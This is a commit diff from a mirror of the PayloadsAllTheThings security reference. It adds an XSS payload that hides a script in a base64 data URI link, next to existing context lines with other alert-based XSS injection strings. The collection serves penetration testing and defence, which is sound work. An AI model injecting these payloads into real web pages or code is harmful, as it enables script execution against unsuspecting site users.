mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-05-08 21:14:42 +02:00
XSS using base64 encoded href data in a link
This commit is contained in:
parent
ea0bddc18a
commit
c7a292c19d
1 changed files with 7 additions and 1 deletions
|
|
@ -162,6 +162,12 @@ URL/<script>alert('XSS');//
|
||||||
URL/<input autofocus onfocus=alert(1)>
|
URL/<input autofocus onfocus=alert(1)>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XSS using base64 encoded href data in a link
|
||||||
|
|
||||||
|
```
|
||||||
|
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
|
||||||
|
```
|
||||||
|
|
||||||
## XSS in wrappers javascript and data URI
|
## XSS in wrappers javascript and data URI
|
||||||
|
|
||||||
XSS with javascript:
|
XSS with javascript:
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue